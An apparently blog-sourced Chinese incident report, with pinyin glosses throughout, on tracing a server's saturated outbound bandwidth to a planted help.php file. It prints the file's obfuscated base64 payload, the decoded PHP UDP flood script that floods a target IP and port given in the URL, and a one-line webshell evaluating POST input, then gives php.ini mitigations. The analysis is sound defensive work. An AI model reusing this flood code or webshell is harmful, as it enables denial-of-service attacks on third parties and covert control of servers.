近來有（yǒu）一兩台服務器網絡常出現問題，甚至斷網，PING直接大量掉包（bāo）。重啟後正（zhèng）常。

後經查，帶寬占用過高，出（chū）現問題時帶（dài）寬占用百（bǎi）分之一百。初步估計（jì）是有攻擊了，使用監控觀察，有少（shǎo）量UDP攻擊（據經驗如（rú）此量（liàng）的UDP是不會占用一百M的，也十分疑（yí）惑）。啟動攻擊防禦措施，但（dàn）無濟於事。後查（chá）看單個（gè）網站（zhàn）帶寬，也（yě）沒（méi）有（yǒu）異（yì）常。
查看帶寬進出（chū）的吞（tūn）吐量，當帶（dài）寬占用（yòng）過高的時候，是發送（sòng）字節吞吐量占用百分之一百。而接收（shōu）幾乎為零（líng）。這不像是DDOS攻擊，不排除會有“下載攻擊（jī）”。搜（sōu）索大型壓縮文件、視頻文件（jiàn）、應（yīng）用程（chéng）序並（bìng）禁（jìn）止下載。還（hái）是會出（chū）現類似的情況。
後裝入DU METER和某（mǒu）一個（gè）帶有流量監控功能（néng）的軟件。等（děng）待（dài）“攻擊”再次到來。“攻擊”過後登陸後查（chá）看，確實是長（zhǎng）時間占（zhàn）用了大量帶寬。查看是W3WP.EXE發送的流量比較多。達數（shù）十G之巨（jù）。記錄每一個W3WP.EXE進程的PID並使用IISAPP查（chá）看對應的程序池。結束發送流量最大的W3WP.EXE，再查看少了哪一個（gè）W3WP.EXE對（duì）應（yīng）的程序池。跟著把當前（qián）程（chéng）序池（chí）下（xià）所有的網站分池。設置每一（yī）個網站單獨一個程序池。再一次等待“攻擊”。等新的“攻擊”來（lái）後，再使用（yòng）上麵的（de）方（fāng）法查（chá）到是某一（yī）個程（chéng）序池，這樣就查到了出（chū）問題的站點。仔細檢查後（hòu），網（wǎng）站內（nèi）除了HTM文件、部分（fèn）圖片和一個PHP文件外，僅有一個目錄裏（lǐ）含有ASP文件。直接停（tíng）止含ASP文件（jiàn）的目錄讀取（qǔ）權限。問（wèn）題還是存在（zài），所（suǒ）以把目光盯到（dào）PHP文件（jiàn）上。查看IIS日誌後看到有這麽一行日（rì）誌2010-09-05 13:21:25 W3SVC83 60.191.XXX.XXX GET /help.php ip=222.87.129.XXX&port=80&time=7200 80 - 122.225.115.XXX Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1) 401 5 5 1726 410。 問題（tí）就已經很清楚了（le）。在瀏覽器裏麵輸入WWW.域（yù）名.COM/help.php ip=222.87.129.XXX&port=80&time=7200服務器帶寬占用立馬漲（zhǎng）為百分之一（yī）百。
查到問（wèn）題所在，分析PHP文件。

源文件：
<?php evals(gzinflate(base64_decode('DZNHkqNIAADv85HpDg4tTGFidrYDCRBOOOEvG5gqrPBOvH77CRmZ+f3vP99DOfz6Bbek/SjOqkNtssCPNJkhTf2Xw6zP4cdvIbfUZlQ1XhQchHDF3z39Ldpx33Lk9Xm78dUoCHeKfilO46tqg21DiEg+BCTz9QW/GD+lMGtThrSmdSEMLbVkzvPt3s0UMS3mDx0WoG2nY+gB2L+fufDyzPU6gNJxAYSarbsanhimzJbUoqZuY0+lV4H6GZtDX9LxkE9L29swfGYibUTtUsoPqIRi7nFBpdmW0t5ECFWjzmfZe2xqERmtMLVpOqnY436BfrDxK10KYOfGAWN7s3geqB7RdV7WkxiBHZU4wyW0LXsmyTdcdwk3TOjduh1F8cyvsgYuaejeLi23csLONsqDsU3gx60zLlm5XQ9jqhbyq949qvb2Us1dqsAGpYvfG3IHY4TxaemBF2mKKY9StKJuDDHxfmI3z+eWa7OwlgvrxeB5Qz4AE2drfLAYmo6litZOUL1GxMlavOlDW8/OMb7ci13dLk1y9XDddGgA4onEBZ0vmx8aSWApy6q2JkpO0i8kg1qOx7EVPgEJNSOLyzZIW8ApDL+V0/0Fstph3qQI+1qQuCwxiZH1aaTMKJItxW5rmz4WyrGmOKCUtLvAU2dle3a85a0GJJQWOGX5AnHiILQpplJ9mdpdQsw9TybO4whCCMqjfgOuSJ+rRT+2Ok8rbc/oVd47v+J02tAy9fkMTP2u8HuUo1Ezp5F3XCMyL6ftJAkw+h+R1ljN0M0NYS/TXCpeY1tyOl7Awe8dP5ygq1VxAFoEKQD6EGdWsWMeBzSruEjIQeRbtgx0oRpw2CnKoxFs/KdiQauXc26QYtLSbeaxiAWLeq784jjWnubV2kpIarL4bMVgNxv+9QwM8j1FvNR1yGa9lVsF1hM63tSpymtn4k1QFEGLVowe93kyhxGbRpNXICoPk3oqbB6DL3chsJ4OwQk4FOIc2k4MQ3tKy/vfv78/Pz///Pr+Gfd/')));
解密後：
<?php

$packets = 0;
$ip = $_GET['ip'];
$rand = $_GET['port'];
set_time_limit(0);
ignore_user_abort(FALSE);

$exec_time = $_GET['time'];

$time = time();
print 'Flooded: $ip on port $rand <br><br>';
$max_time = $time+$exec_time;

for($i=0;$i<65535;$i++){
        $out .= 'X';
}
while(1){
$packets++;
        if(time() > $max_time){
                break;
        }
       
        $fp = fsockopen('udp://$ip', $rand, $errno, $errstr, 5);
        if($fp){
                fwrite($fp, $out);
                fclose($fp);
        }
}
echo 'Packet complete at '.time('h:i:s').' with $packets (' . round(($packets*65)/1024, 2) . ' mB) packets averaging '. round($packets/$exec_time, 2) . ' packets/s n';
?>
<?php evals($_POST[ddos])?>

有了代碼，那工作（zuò）原理（lǐ）也就很清（qīng）楚了。
整體來說（shuō），不（bú）是受攻擊了。而是攻擊（jī）別人了。

解決辦法:

不允（yǔn）許PHP使用（yòng）網（wǎng）絡，把php.ini裏（lǐ）的allow_url_fopen 值改為（wéi）allow_url_fopen = Off

如果不（bú）行

;extension=php_sockets.dll （限（xiàn）製使用（yòng）sockets.dll）
;ignore_user_abort = On
這兩（liǎng）項前（qián）加上分（fèn）號。
但默認（rèn）這兩項就是這樣設置（zhì）的。防止某些同誌手動打開了的。
然後重（chóng）啟IIS。